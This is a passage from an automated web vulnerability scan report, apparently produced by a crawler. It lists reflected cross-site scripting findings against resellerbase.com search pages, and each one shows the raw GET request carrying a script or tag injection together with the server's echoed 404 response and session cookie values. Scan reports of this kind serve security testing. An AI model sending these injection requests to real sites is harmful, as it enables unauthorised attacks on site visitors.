Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2cda77<a>5c9383b8238 was not found on this server.</p>
...[SNIP]...

2.3623. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b7e84<script>alert(1)</script>7d5827e71e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb7e84<script>alert(1)</script>7d5827e71e7/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb7e84<script>alert(1)</script>7d5827e71e7/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3624. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cea5<script>alert(1)</script>148242dac8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/79cea5<script>alert(1)</script>148242dac8a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/79cea5<script>alert(1)</script>148242dac8a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3625. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81439<script>alert(1)</script>fbfb712b4f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes81439<script>alert(1)</script>fbfb712b4f0/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes81439<script>alert(1)</script>fbfb712b4f0/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3626. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload db599<script>alert(1)</script>7689ebe4521 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmosdb599<script>alert(1)</script>7689ebe4521/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmosdb599<script>alert(1)</script>7689ebe4521/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3627. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 11d4f<script>alert(1)</script>fe4da56da58 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/search.php11d4f<script>alert(1)</script>fe4da56da58?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php11d4f<script>alert(1)</script>fe4da56da58?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3628. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload db176<a>e1052aa3fd9 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Searchdb176<a>e1052aa3fd9&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Searchdb176<a>e1052aa3fd9&opt=2 was not found on this server.</p>
...[SNIP]...

2.3629. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload afee3<a>d39999c4632 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...afee3<a>d39999c4632&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php?keyword=search...afee3<a>d39999c4632&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3630. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b10ae<script>alert(1)</script>d3136c3e7f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b10ae<script>alert(1)</script>d3136c3e7f0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b10ae<script>alert(1)</script>d3136c3e7f0=1 was not found on this server.</p>
...[SNIP]...

2.3631. http://www.resellerbase.com/detail/7/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4e31a<a>969cf8f6067 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24e31a<a>969cf8f6067 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24e31a<a>969cf8f6067 was not found on this server.</p>
...[SNIP]...

2.3632. http://www.resellerbase.com/detail/7/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5188b<script>alert(1)</script>641ca5fbd6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5188b<script>alert(1)</script>641ca5fbd6d/7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5188b<script>alert(1)</script>641ca5fbd6d/7/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3633. http://www.resellerbase.com/detail/7/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32639<script>alert(1)</script>82ff56efc61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/732639<script>alert(1)</script>82ff56efc61/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/732639<script>alert(1)</script>82ff56efc61/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3634. http://www.resellerbase.com/detail/7/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5938f<script>alert(1)</script>92fdd4f2dce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes5938f<script>alert(1)</script>92fdd4f2dce/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes5938f<script>alert(1)</script>92fdd4f2dce/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3635. http://www.resellerbase.com/detail/7/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7a83d<script>alert(1)</script>865fa517da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/search.php7a83d<script>alert(1)</script>865fa517da?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php7a83d<script>alert(1)</script>865fa517da?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3636. http://www.resellerbase.com/detail/7/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 60fb9<a>b3d01599060 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/search.php?keyword=search...&Submit3=Search60fb9<a>b3d01599060&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php?keyword=search...&Submit3=Search60fb9<a>b3d01599060&opt=2 was not found on this server.</p>
...[SNIP]...

2.3637. http://www.resellerbase.com/detail/7/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5f5c5<a>3dfb6db11ad was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/search.php?keyword=search...5f5c5<a>3dfb6db11ad&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php?keyword=search...5f5c5<a>3dfb6db11ad&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3638. http://www.resellerbase.com/detail/7/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 89e74<script>alert(1)</script>50b0816cb9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=2&89e74<script>alert(1)</script>50b0816cb9d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=2&89e74<script>alert(1)</script>50b0816cb9d=1 was not found on this server.</p>
...[SNIP]...

2.3639. http://www.resellerbase.com/detail/7/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/7/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2ffa8<a>63c44135ddf was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=22ffa8<a>63c44135ddf HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=22ffa8<a>63c44135ddf was not found on this server.</p>
...[SNIP]...

2.3640. http://www.resellerbase.com/detail/8/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6c98<script>alert(1)</script>fe099c9d811 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild6c98<script>alert(1)</script>fe099c9d811/8/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
